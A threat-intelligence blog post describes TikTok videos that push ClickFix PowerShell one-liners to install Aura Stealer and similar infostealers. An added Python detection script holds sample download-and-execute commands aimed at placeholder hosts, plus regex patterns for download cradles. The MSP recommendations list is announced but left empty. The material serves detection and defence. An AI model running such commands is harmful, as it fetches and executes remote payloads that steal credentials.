TikTok “Activation Hacks” Are Luring Users into Running Infostealers
By: Bryson Medlock
A new wave of ClickFix attacks is using TikTok videos to trick users into running PowerShell commands that install info-stealing malware. These campaigns are targeting users looking for free software activations and are spreading rapidly across social media.
Threat Details
Cybercriminals are leveraging TikTok’s viral content model to distribute malware through short videos that pose as software activation tutorials. These videos claim to unlock premium features in applications like Windows, Microsoft 365, Adobe Premiere, and even fake services like “Spotify Premium Boost.” The tactic is part of a broader social engineering technique known as ClickFix.
The attack flow is simple but effective: the video shows a one-liner PowerShell command and instructs viewers to run it as an administrator. The command connects to a remote domain and downloads a secondary script. This script then retrieves two executables, ‘updater.exe’ and ‘source.exe’, from Cloudflare Pages. The first is a variant of the Aura Stealer malware, which exfiltrates browser credentials, cookies, crypto wallets, and app logins. The second payload compiles and injects additional code in memory using .NET’s C# compiler, likely to evade detection and extend functionality.
What makes this campaign particularly dangerous is its use of trusted platforms and realistic branding. Some videos use AI-generated avatars and polished editing to appear legitimate. The malware executes entirely in memory, bypassing many traditional antivirus solutions. This is not a new technique: ClickFix has been a common initial access technique in phishing and malvertising campaigns throughout the past year, but TikTok’s reach and engagement make it a potent delivery vector.
Researchers have also observed variants of this campaign delivering other infostealers like Vidar, StealC, and Latrodectus, depending on the payload source. These strains are capable of harvesting a wide range of sensitive data and are often used in follow-on attacks, including account takeovers and crypto theft.
The campaign’s success hinges on user interaction. There’s no exploit or vulnerability involved, just social engineering. This makes it harder to detect and block at the network level, especially in environments where users have local admin rights or where PowerShell logging is not enforced.
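As an added illustration (not code from the original article), here is a small Python triage pass over constructed PowerShell ScriptBlock-logging texts (Event ID 4104) that flags the behaviours the flow above describes: a remote script piped straight into iex, an executable fetched from a Cloudflare Pages host (pages.dev, the platform’s default domain) into %TEMP%, and in-memory C# compilation via Add-Type. The sample blocks, hostnames, rule names and weights are all constructed for this example and would need tuning to a real estate.

```python
import re

# Constructed sample ScriptBlock-logging texts (Event ID 4104); not real campaign data.
SAMPLE_SCRIPT_BLOCKS = [
    # ClickFix-style "activation" one-liner: remote script piped straight into iex
    "iex (irm https://example.invalid/activate)",
    # Second-stage style: fetch an exe from a Cloudflare Pages host into %TEMP%
    "Invoke-WebRequest -Uri https://placeholder.pages.dev/updater.exe "
    "-OutFile $env:TEMP\\updater.exe",
    # In-memory C# compilation, as the article describes for the second payload
    "Add-Type -TypeDefinition $src -Language CSharp",
    # Ordinary admin activity that should not fire on its own
    "Get-Service | Where-Object Status -eq 'Running'",
    "Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass",
]

FETCH = r"(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)"
EVAL = r"(?:iex|invoke-expression)"

# (name, regex, weight); the weights are a judgement call, tune them to your estate.
RULES = [
    ("download_cradle", re.compile(
        rf"\b{EVAL}\b.*\b{FETCH}\b|\b{FETCH}\b.*\|\s*{EVAL}\b", re.I), 3),
    ("cloudflare_pages_host", re.compile(r"https?://[^\s'\"]+\.pages\.dev\b", re.I), 2),
    ("exe_dropped_to_temp", re.compile(r"-OutFile\s+\$env:TEMP.*\.exe\b", re.I), 1),
    ("inline_csharp_compile", re.compile(r"\bAdd-Type\b.*-TypeDefinition\b", re.I), 2),
    ("encoded_command", re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I), 2),
    ("execution_policy_bypass", re.compile(r"-ExecutionPolicy\s+Bypass\b", re.I), 1),
]
ALERT_THRESHOLD = 2  # one strong indicator, or two weak ones, raises an alert

def score_script_block(text):
    """Score one 4104 script block; returns (score, [matched rule names])."""
    hits = [name for name, rx, _ in RULES if rx.search(text)]
    score = sum(weight for name, _, weight in RULES if name in hits)
    return score, hits

def triage(blocks, threshold=ALERT_THRESHOLD):
    """Return the blocks whose score reaches the threshold, with their hits."""
    alerts = []
    for text in blocks:
        score, hits = score_script_block(text)
        if score >= threshold:
            alerts.append({"script": text, "score": score, "hits": hits})
    return alerts

if __name__ == "__main__":
    for alert in triage(SAMPLE_SCRIPT_BLOCKS):
        print(alert["score"], alert["hits"], alert["script"][:60])
```

Script block logging has to be turned on before any of this is visible, which is exactly the gap the article calls out for environments where PowerShell logging is not enforced.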
What This Means for MSPs:
This campaign is a reminder that user behavior, not just technical controls, remains a critical part of the threat landscape. SMB clients are especially vulnerable, as they often lack centralized controls over PowerShell execution and may not have strong user education programs in place.
MSPs should consider the following actions:
This isn’t just a TikTok problem—it’s a visibility and trust problem. As attackers continue to exploit social platforms, MSPs must stay proactive in both technical defenses and user awareness.
I fix things
3d
Administrators should know better! Don’t run a command that you don’t understand, especially if it’s from an untrusted source. 👺💣
Specialist Consultant @ Cyber Partner Protect | Risk Management & Innovation
4d
Based on the personal family networks, are there risks in how members use their devices connected through subscriptions, Apple Pay etc.